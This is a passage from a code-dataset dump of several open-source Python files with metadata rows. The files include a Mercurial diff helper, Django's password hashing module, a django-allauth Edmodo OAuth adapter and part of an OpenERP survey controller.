return GIAnnotation ("allow-none", ALLOW_NONE_HELP)
def __make_transfer_annotation(self, annotation, value):
if value[0] == "none":
return GIAnnotation ("transfer: none", TRANSFER_NONE_HELP)
elif value[0] == "full":
return GIAnnotation ("transfer: full", TRANSFER_FULL_HELP)
elif value[0] == "floating":
return GIAnnotation ("transfer: floating", TRANSFER_FLOATING_HELP)
elif value[0] == "container":
return GIAnnotation ("transfer: container", TRANSFER_CONTAINER_HELP)
else:
return None
def __make_inout_annotation (self, annotation, value):
return GIAnnotation ("inout", DIRECTION_INOUT_HELP)
def __make_out_annotation (self, annotation, value):
return GIAnnotation ("out", DIRECTION_OUT_HELP)
def __make_in_annotation (self, annotation, value):
return GIAnnotation ("in", DIRECTION_IN_HELP)
def __make_element_type_annotation (self, annotation, value):
annotation_val = None
if type(value) == list:
annotation_val = value[0]
return GIAnnotation ("element-type", ELEMENT_TYPE_HELP, annotation_val)
def __make_array_annotation (self, annotation, value):
annotation_val = None
if type(value) == dict:
annotation_val = ""
for name, val in value.items():
annotation_val += "%s=%s" % (name, val)
return GIAnnotation ("array", ARRAY_HELP, annotation_val)
def __make_scope_annotation (self, annotation, value):
if type (value) != list or not value:
return None
if value[0] == "async":
return GIAnnotation ("scope async", SCOPE_ASYNC_HELP)
elif value[0] == "call":
return GIAnnotation ("scope call", SCOPE_CALL_HELP)
elif value[0] == 'notified':
return GIAnnotation ("scope notified", SCOPE_NOTIFIED_HELP)
return None
def __make_closure_annotation (self, annotation, value):
if type (value) != list or not value:
return GIAnnotation ("closure", CLOSURE_DATA_HELP)
return GIAnnotation ("closure", CLOSURE_HELP % value[0])
def __make_default_annotation (self, annotation, value):
return GIAnnotation ("default %s" % str (value[0]), DEFAULT_HELP)
def __make_destroy_annotation (self, annotation, value):
if value:
return GIAnnotation ("destroy %s" % str (value[0]), DESTROY_HELP)
else:
return GIAnnotation ("destroy", DESTROY_HELP)
def __make_not_nullable_annotation(self):
return GIAnnotation("not nullable", NOT_NULLABLE_HELP)
def __create_annotation (self, annotation_name, annotation_value):
factory = self.__annotation_factories.get(annotation_name)
if not factory:
return None
return factory (annotation_name, annotation_value)
def make_annotations (self, parameter):
if not parameter.comment:
return []
if not parameter.comment.annotations:
return []
annotations = []
for ann, val in parameter.comment.annotations.items():
if ann == "skip":
continue
annotation = self.__create_annotation (ann, val.argument)
if not annotation:
# Special case for silly specification
if (ann == 'not' and len(val.argument) == 1 and
val.argument[0] == 'nullable'):
annotations.append(self.__make_not_nullable_annotation())
else:
print("This parameter annotation is unknown :[" + ann + "]", val.argument)
continue
annotations.append (annotation)
return annotations
| lgpl-2.1 | -1,495,014,013,697,048,800 | 34.648402 | 94 | 0.636352 | false |
MER-GROUP/intellij-community | plugins/hg4idea/testData/bin/mercurial/bdiff.py | 96 | 2318 | # bdiff.py - Python implementation of bdiff.c
#
# Copyright 2009 Matt Mackall <[email protected]> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import struct, difflib, re
def splitnewlines(text):
'''like str.splitlines, but only split on newlines.'''
lines = [l + '\n' for l in text.split('\n')]
if lines:
if lines[-1] == '\n':
lines.pop()
else:
lines[-1] = lines[-1][:-1]
return lines
def _normalizeblocks(a, b, blocks):
prev = None
r = []
for curr in blocks:
if prev is None:
prev = curr
continue
shift = 0
a1, b1, l1 = prev
a1end = a1 + l1
b1end = b1 + l1
a2, b2, l2 = curr
a2end = a2 + l2
b2end = b2 + l2
if a1end == a2:
while (a1end + shift < a2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
elif b1end == b2:
while (b1end + shift < b2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
r.append((a1, b1, l1 + shift))
prev = a2 + shift, b2 + shift, l2 - shift
r.append(prev)
return r
def bdiff(a, b):
a = str(a).splitlines(True)
b = str(b).splitlines(True)
if not a:
s = "".join(b)
return s and (struct.pack(">lll", 0, 0, len(s)) + s)
bin = []
p = [0]
for i in a: p.append(p[-1] + len(i))
d = difflib.SequenceMatcher(None, a, b).get_matching_blocks()
d = _normalizeblocks(a, b, d)
la = 0
lb = 0
for am, bm, size in d:
s = "".join(b[lb:bm])
if am > la or s:
bin.append(struct.pack(">lll", p[la], p[am], len(s)) + s)
la = am + size
lb = bm + size
return "".join(bin)
def blocks(a, b):
an = splitnewlines(a)
bn = splitnewlines(b)
d = difflib.SequenceMatcher(None, an, bn).get_matching_blocks()
d = _normalizeblocks(an, bn, d)
return [(i, i + n, j, j + n) for (i, j, n) in d]
def fixws(text, allws):
if allws:
text = re.sub('[ \t\r]+', '', text)
else:
text = re.sub('[ \t\r]+', ' ', text)
text = text.replace(' \n', '\n')
return text
| apache-2.0 | 6,327,118,730,232,321,000 | 25.643678 | 73 | 0.502588 | false |
nitin-cherian/Webapps | SimpleIsBetterThanComplex.com/myproject/.env/lib/python3.5/site-packages/django/contrib/auth/hashers.py | 64 | 22352 | from __future__ import unicode_literals
import base64
import binascii
import hashlib
import importlib
import warnings
from collections import OrderedDict
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.dispatch import receiver
from django.utils import lru_cache
from django.utils.crypto import (
constant_time_compare, get_random_string, pbkdf2,
)
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext_noop as _
UNUSABLE_PASSWORD_PREFIX = '!' # This will never be a valid encoded hash
UNUSABLE_PASSWORD_SUFFIX_LENGTH = 40 # number of random chars to add after UNUSABLE_PASSWORD_PREFIX
def is_password_usable(encoded):
if encoded is None or encoded.startswith(UNUSABLE_PASSWORD_PREFIX):
return False
try:
identify_hasher(encoded)
except ValueError:
return False
return True
def check_password(password, encoded, setter=None, preferred='default'):
"""
Returns a boolean of whether the raw password matches the three
part encoded digest.
If setter is specified, it'll be called when you need to
regenerate the password.
"""
if password is None or not is_password_usable(encoded):
return False
preferred = get_hasher(preferred)
hasher = identify_hasher(encoded)
hasher_changed = hasher.algorithm != preferred.algorithm
must_update = hasher_changed or preferred.must_update(encoded)
is_correct = hasher.verify(password, encoded)
# If the hasher didn't change (we don't protect against enumeration if it
# does) and the password should get updated, try to close the timing gap
# between the work factor of the current encoded password and the default
# work factor.
if not is_correct and not hasher_changed and must_update:
hasher.harden_runtime(password, encoded)
if setter and is_correct and must_update:
setter(password)
return is_correct
def make_password(password, salt=None, hasher='default'):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generates a new random salt.
If password is None then a concatenation of
UNUSABLE_PASSWORD_PREFIX and a random string will be returned
which disallows logins. Additional random string reduces chances
of gaining access to staff or superuser accounts.
See ticket #20079 for more info.
"""
if password is None:
return UNUSABLE_PASSWORD_PREFIX + get_random_string(UNUSABLE_PASSWORD_SUFFIX_LENGTH)
hasher = get_hasher(hasher)
if not salt:
salt = hasher.salt()
return hasher.encode(password, salt)
@lru_cache.lru_cache()
def get_hashers():
hashers = []
for hasher_path in settings.PASSWORD_HASHERS:
hasher_cls = import_string(hasher_path)
hasher = hasher_cls()
if not getattr(hasher, 'algorithm'):
raise ImproperlyConfigured("hasher doesn't specify an "
"algorithm name: %s" % hasher_path)
hashers.append(hasher)
return hashers
@lru_cache.lru_cache()
def get_hashers_by_algorithm():
return {hasher.algorithm: hasher for hasher in get_hashers()}
@receiver(setting_changed)
def reset_hashers(**kwargs):
if kwargs['setting'] == 'PASSWORD_HASHERS':
get_hashers.cache_clear()
get_hashers_by_algorithm.cache_clear()
def get_hasher(algorithm='default'):
"""
Returns an instance of a loaded password hasher.
If algorithm is 'default', the default hasher will be returned.
This function will also lazy import hashers specified in your
settings file if needed.
"""
if hasattr(algorithm, 'algorithm'):
return algorithm
elif algorithm == 'default':
return get_hashers()[0]
else:
hashers = get_hashers_by_algorithm()
try:
return hashers[algorithm]
except KeyError:
raise ValueError("Unknown password hashing algorithm '%s'. "
"Did you specify it in the PASSWORD_HASHERS "
"setting?" % algorithm)
def identify_hasher(encoded):
"""
Returns an instance of a loaded password hasher.
Identifies hasher algorithm by examining encoded hash, and calls
get_hasher() to return hasher. Raises ValueError if
algorithm cannot be identified, or if hasher is not loaded.
"""
# Ancient versions of Django created plain MD5 passwords and accepted
# MD5 passwords with an empty salt.
if ((len(encoded) == 32 and '$' not in encoded) or
(len(encoded) == 37 and encoded.startswith('md5$$'))):
algorithm = 'unsalted_md5'
# Ancient versions of Django accepted SHA1 passwords with an empty salt.
elif len(encoded) == 46 and encoded.startswith('sha1$$'):
algorithm = 'unsalted_sha1'
else:
algorithm = encoded.split('$', 1)[0]
return get_hasher(algorithm)
def mask_hash(hash, show=6, char="*"):
"""
Returns the given hash, with only the first ``show`` number shown. The
rest are masked with ``char`` for security reasons.
"""
masked = hash[:show]
masked += char * len(hash[show:])
return masked
class BasePasswordHasher(object):
"""
Abstract base class for password hashers
When creating your own hasher, you need to override algorithm,
verify(), encode() and safe_summary().
PasswordHasher objects are immutable.
"""
algorithm = None
library = None
def _load_library(self):
if self.library is not None:
if isinstance(self.library, (tuple, list)):
name, mod_path = self.library
else:
mod_path = self.library
try:
module = importlib.import_module(mod_path)
except ImportError as e:
raise ValueError("Couldn't load %r algorithm library: %s" %
(self.__class__.__name__, e))
return module
raise ValueError("Hasher %r doesn't specify a library attribute" %
self.__class__.__name__)
def salt(self):
"""
Generates a cryptographically secure nonce salt in ASCII
"""
return get_random_string()
def verify(self, password, encoded):
"""
Checks if the given password is correct
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a verify() method')
def encode(self, password, salt):
"""
Creates an encoded database value
The result is normally formatted as "algorithm$salt$hash" and
must be fewer than 128 characters.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide an encode() method')
def safe_summary(self, encoded):
"""
Returns a summary of safe values
The result is a dictionary and will be used where the password field
must be displayed to construct a safe representation of the password.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a safe_summary() method')
def must_update(self, encoded):
return False
def harden_runtime(self, password, encoded):
"""
Bridge the runtime gap between the work factor supplied in `encoded`
and the work factor suggested by this hasher.
Taking PBKDF2 as an example, if `encoded` contains 20000 iterations and
`self.iterations` is 30000, this method should run password through
another 10000 iterations of PBKDF2. Similar approaches should exist
for any hasher that has a work factor. If not, this method should be
defined as a no-op to silence the warning.
"""
warnings.warn('subclasses of BasePasswordHasher should provide a harden_runtime() method')
class PBKDF2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the PBKDF2 algorithm (recommended)
Configured to use PBKDF2 + HMAC + SHA256.
The result is a 64 byte binary string. Iterations may be changed
safely but you must rename the algorithm if you change SHA256.
"""
algorithm = "pbkdf2_sha256"
iterations = 36000
digest = hashlib.sha256
def encode(self, password, salt, iterations=None):
assert password is not None
assert salt and '$' not in salt
if not iterations:
iterations = self.iterations
hash = pbkdf2(password, salt, iterations, digest=self.digest)
hash = base64.b64encode(hash).decode('ascii').strip()
return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash)
def verify(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt, int(iterations))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('iterations'), iterations),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(hash)),
])
def must_update(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
return int(iterations) != self.iterations
def harden_runtime(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
extra_iterations = self.iterations - int(iterations)
if extra_iterations > 0:
self.encode(password, salt, extra_iterations)
class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher):
"""
Alternate PBKDF2 hasher which uses SHA1, the default PRF
recommended by PKCS #5. This is compatible with other
implementations of PBKDF2, such as openssl's
PKCS5_PBKDF2_HMAC_SHA1().
"""
algorithm = "pbkdf2_sha1"
digest = hashlib.sha1
class Argon2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the argon2 algorithm.
This is the winner of the Password Hashing Competition 2013-2015
(https://password-hashing.net). It requires the argon2-cffi library which
depends on native C code and might cause portability issues.
"""
algorithm = 'argon2'
library = 'argon2'
time_cost = 2
memory_cost = 512
parallelism = 2
def encode(self, password, salt):
argon2 = self._load_library()
data = argon2.low_level.hash_secret(
force_bytes(password),
force_bytes(salt),
time_cost=self.time_cost,
memory_cost=self.memory_cost,
parallelism=self.parallelism,
hash_len=argon2.DEFAULT_HASH_LENGTH,
type=argon2.low_level.Type.I,
)
return self.algorithm + data.decode('ascii')
def verify(self, password, encoded):
argon2 = self._load_library()
algorithm, rest = encoded.split('$', 1)
assert algorithm == self.algorithm
try:
return argon2.low_level.verify_secret(
force_bytes('$' + rest),
force_bytes(password),
type=argon2.low_level.Type.I,
)
except argon2.exceptions.VerificationError:
return False
def safe_summary(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('variety'), variety),
(_('version'), version),
(_('memory cost'), memory_cost),
(_('time cost'), time_cost),
(_('parallelism'), parallelism),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(data)),
])
def must_update(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
argon2 = self._load_library()
return (
argon2.low_level.ARGON2_VERSION != version or
self.time_cost != time_cost or
self.memory_cost != memory_cost or
self.parallelism != parallelism
)
def harden_runtime(self, password, encoded):
# The runtime for Argon2 is too complicated to implement a sensible
# hardening algorithm.
pass
def _decode(self, encoded):
"""
Split an encoded hash and return: (
algorithm, variety, version, time_cost, memory_cost,
parallelism, salt, data,
).
"""
bits = encoded.split('$')
if len(bits) == 5:
# Argon2 < 1.3
algorithm, variety, raw_params, salt, data = bits
version = 0x10
else:
assert len(bits) == 6
algorithm, variety, raw_version, raw_params, salt, data = bits
assert raw_version.startswith('v=')
version = int(raw_version[len('v='):])
params = dict(bit.split('=', 1) for bit in raw_params.split(','))
assert len(params) == 3 and all(x in params for x in ('t', 'm', 'p'))
time_cost = int(params['t'])
memory_cost = int(params['m'])
parallelism = int(params['p'])
return (
algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data,
)
class BCryptSHA256PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the bcrypt algorithm (recommended)
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
"""
algorithm = "bcrypt_sha256"
digest = hashlib.sha256
library = ("bcrypt", "bcrypt")
rounds = 12
def salt(self):
bcrypt = self._load_library()
return bcrypt.gensalt(self.rounds)
def encode(self, password, salt):
bcrypt = self._load_library()
# Hash the password prior to using bcrypt to prevent password
# truncation as described in #20138.
if self.digest is not None:
# Use binascii.hexlify() because a hex encoded bytestring is
# Unicode on Python 3.
password = binascii.hexlify(self.digest(force_bytes(password)).digest())
else:
password = force_bytes(password)
data = bcrypt.hashpw(password, salt)
return "%s$%s" % (self.algorithm, force_text(data))
def verify(self, password, encoded):
algorithm, data = encoded.split('$', 1)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, force_bytes(data))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, empty, algostr, work_factor, data = encoded.split('$', 4)
assert algorithm == self.algorithm
salt, checksum = data[:22], data[22:]
return OrderedDict([
(_('algorithm'), algorithm),
(_('work factor'), work_factor),
(_('salt'), mask_hash(salt)),
(_('checksum'), mask_hash(checksum)),
])
def must_update(self, encoded):
algorithm, empty, algostr, rounds, data = encoded.split('$', 4)
return int(rounds) != self.rounds
def harden_runtime(self, password, encoded):
_, data = encoded.split('$', 1)
salt = data[:29] # Length of the salt in bcrypt.
rounds = data.split('$')[2]
# work factor is logarithmic, adding one doubles the load.
diff = 2**(self.rounds - int(rounds)) - 1
while diff > 0:
self.encode(password, force_bytes(salt))
diff -= 1
class BCryptPasswordHasher(BCryptSHA256PasswordHasher):
"""
Secure password hashing using the bcrypt algorithm
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
This hasher does not first hash the password which means it is subject to
the 72 character bcrypt password truncation, most use cases should prefer
the BCryptSHA256PasswordHasher.
See: https://code.djangoproject.com/ticket/20138
"""
algorithm = "bcrypt"
digest = None
class SHA1PasswordHasher(BasePasswordHasher):
"""
The SHA1 password hashing algorithm (not recommended)
"""
algorithm = "sha1"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.sha1(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class MD5PasswordHasher(BasePasswordHasher):
"""
The Salted MD5 password hashing algorithm (not recommended)
"""
algorithm = "md5"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.md5(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedSHA1PasswordHasher(BasePasswordHasher):
"""
Very insecure algorithm that you should *never* use; stores SHA1 hashes
with an empty salt.
This class is implemented because Django used to accept such password
hashes. Some older Django installs still have these values lingering
around so we need to handle and upgrade them properly.
"""
algorithm = "unsalted_sha1"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
hash = hashlib.sha1(force_bytes(password)).hexdigest()
return 'sha1$$%s' % hash
def verify(self, password, encoded):
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
assert encoded.startswith('sha1$$')
hash = encoded[6:]
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedMD5PasswordHasher(BasePasswordHasher):
"""
Incredibly insecure algorithm that you should *never* use; stores unsalted
MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an
empty salt.
This class is implemented because Django used to store passwords this way
and to accept such password hashes. Some older Django installs still have
these values lingering around so we need to handle and upgrade them
properly.
"""
algorithm = "unsalted_md5"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
return hashlib.md5(force_bytes(password)).hexdigest()
def verify(self, password, encoded):
if len(encoded) == 37 and encoded.startswith('md5$$'):
encoded = encoded[5:]
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(encoded, show=3)),
])
def harden_runtime(self, password, encoded):
pass
class CryptPasswordHasher(BasePasswordHasher):
"""
Password hashing using UNIX crypt (not recommended)
The crypt module is not supported on all platforms.
"""
algorithm = "crypt"
library = "crypt"
def salt(self):
return get_random_string(2)
def encode(self, password, salt):
crypt = self._load_library()
assert len(salt) == 2
data = crypt.crypt(force_str(password), salt)
assert data is not None # A platform like OpenBSD with a dummy crypt module.
# we don't need to store the salt, but Django used to do this
return "%s$%s$%s" % (self.algorithm, '', data)
def verify(self, password, encoded):
crypt = self._load_library()
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return constant_time_compare(data, crypt.crypt(force_str(password), data))
def safe_summary(self, encoded):
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), salt),
(_('hash'), mask_hash(data, show=3)),
])
def harden_runtime(self, password, encoded):
pass
| mit | -218,046,103,862,718,460 | 33.229709 | 106 | 0.628624 | false |
beswarm/django-allauth | allauth/socialaccount/providers/edmodo/views.py | 40 | 1075 | import requests
from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter,
OAuth2LoginView,
OAuth2CallbackView)
from allauth.socialaccount.providers import registry
from .provider import EdmodoProvider
class EdmodoOAuth2Adapter(OAuth2Adapter):
provider_id = EdmodoProvider.id
access_token_url = 'https://api.edmodo.com/oauth/token'
authorize_url = 'https://api.edmodo.com/oauth/authorize'
profile_url = 'https://api.edmodo.com/users/me'
def complete_login(self, request, app, token, **kwargs):
resp = requests.get(self.profile_url,
params={'access_token': token.token})
extra_data = resp.json()
return self.get_provider().sociallogin_from_response(request,
extra_data)
oauth2_login = OAuth2LoginView.adapter_view(EdmodoOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(EdmodoOAuth2Adapter)
| mit | -4,575,838,392,372,738,600 | 40.346154 | 77 | 0.615814 | false |
rvalyi/OpenUpgrade | addons/survey/controllers/main.py | 20 | 19094 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import json
import logging
import werkzeug
from datetime import datetime
from math import ceil
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT as DTF
from openerp.tools.safe_eval import safe_eval
_logger = logging.getLogger(__name__)
class WebsiteSurvey(http.Controller):
## HELPER METHODS ##
def _check_bad_cases(self, cr, uid, request, survey_obj, survey, user_input_obj, context=None):
# In case of bad survey, redirect to surveys list
if survey_obj.exists(cr, SUPERUSER_ID, survey.id, context=context) == []:
return werkzeug.utils.redirect("/survey/")
# In case of auth required, block public user
if survey.auth_required and uid == request.website.user_id.id:
return request.website.render("website.403")
# In case of non open surveys
if survey.stage_id.closed:
return request.website.render("survey.notopen")
# If there is no pages
if not survey.page_ids:
return request.website.render("survey.nopages")
# Everything seems to be ok
return None
def _check_deadline(self, cr, uid, user_input, context=None):
'''Prevent opening of the survey if the deadline has turned out
! This will NOT disallow access to users who have already partially filled the survey !'''
if user_input.deadline:
dt_deadline = datetime.strptime(user_input.deadline, DTF)
dt_now = datetime.now()
if dt_now > dt_deadline: # survey is not open anymore
return request.website.render("survey.notopen")
return None
## ROUTES HANDLERS ##
# Survey start
@http.route(['/survey/start/<model("survey.survey"):survey>',
'/survey/start/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def start_survey(self, survey, token=None, **post):
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Test mode
if token and token == "phantom":
_logger.info("[survey] Phantom mode")
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id, 'test_entry': True}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
# END Test mode
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Manual surveying
if not token:
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
else:
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)], context=context)[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not open expired survey
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # Intro page
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
else:
return request.redirect('/survey/fill/%s/%s' % (survey.id, user_input.token))
# Survey displaying
@http.route(['/survey/fill/<model("survey.survey"):survey>/<string:token>',
'/survey/fill/<model("survey.survey"):survey>/<string:token>/<string:prev>'],
type='http', auth='public', website=True)
def fill_survey(self, survey, token, prev=None, **post):
'''Display and validates a survey'''
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Load the user_input
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)])[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not display expired survey (even if some pages have already been
# displayed -- There's a time for everything!)
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # First page
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, 0, go_back=False, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
elif user_input.state == 'done': # Display success message
return request.website.render('survey.sfinished', {'survey': survey,
'token': token,
'user_input': user_input})
elif user_input.state == 'skip':
flag = (True if prev and prev == 'prev' else False)
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, user_input.last_displayed_page_id.id, go_back=flag, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
else:
return request.website.render("website.403")
# AJAX prefilling of a survey
@http.route(['/survey/prefill/<model("survey.survey"):survey>/<string:token>',
'/survey/prefill/<model("survey.survey"):survey>/<string:token>/<model("survey.page"):page>'],
type='http', auth='public', website=True)
def prefill(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch previous answers
if page:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token), ('page_id', '=', page.id)], context=context)
else:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Return non empty answers in a JSON compatible format
for answer in previous_answers:
if not answer.skipped:
answer_tag = '%s_%s_%s' % (answer.survey_id.id, answer.page_id.id, answer.question_id.id)
answer_value = None
if answer.answer_type == 'free_text':
answer_value = answer.value_free_text
elif answer.answer_type == 'text' and answer.question_id.type == 'textbox':
answer_value = answer.value_text
elif answer.answer_type == 'text' and answer.question_id.type != 'textbox':
# here come comment answers for matrices, simple choice and multiple choice
answer_tag = "%s_%s" % (answer_tag, 'comment')
answer_value = answer.value_text
elif answer.answer_type == 'number':
answer_value = answer.value_number.__str__()
elif answer.answer_type == 'date':
answer_value = answer.value_date
elif answer.answer_type == 'suggestion' and not answer.value_suggested_row:
answer_value = answer.value_suggested.id
elif answer.answer_type == 'suggestion' and answer.value_suggested_row:
answer_tag = "%s_%s" % (answer_tag, answer.value_suggested_row.id)
answer_value = answer.value_suggested.id
if answer_value:
dict_soft_update(ret, answer_tag, answer_value)
else:
_logger.warning("[survey] No answer has been found for question %s marked as non skipped" % answer_tag)
return json.dumps(ret)
# AJAX scores loading for quiz correction mode
@http.route(['/survey/scores/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def get_scores(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch answers
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Compute score for each question
for answer in previous_answers:
tmp_score = ret.get(answer.question_id.id, 0.0)
ret.update({answer.question_id.id: tmp_score + answer.quizz_mark})
return json.dumps(ret)
# AJAX submission of a page
@http.route(['/survey/submit/<model("survey.survey"):survey>'],
type='http', methods=['POST'], auth='public', website=True)
def submit(self, survey, **post):
_logger.debug('Incoming data: %s', post)
page_id = int(post['page_id'])
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
questions_obj = request.registry['survey.question']
questions_ids = questions_obj.search(cr, uid, [('page_id', '=', page_id)], context=context)
questions = questions_obj.browse(cr, uid, questions_ids, context=context)
# Answer validation
errors = {}
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
errors.update(questions_obj.validate_question(cr, uid, question, post, answer_tag, context=context))
ret = {}
if (len(errors) != 0):
# Return errors messages to webpage
ret['errors'] = errors
else:
# Store answers into database
user_input_obj = request.registry['survey.user_input']
user_input_line_obj = request.registry['survey.user_input_line']
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', post['token'])], context=context)[0]
except KeyError: # Invalid token
return request.website.render("website.403")
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
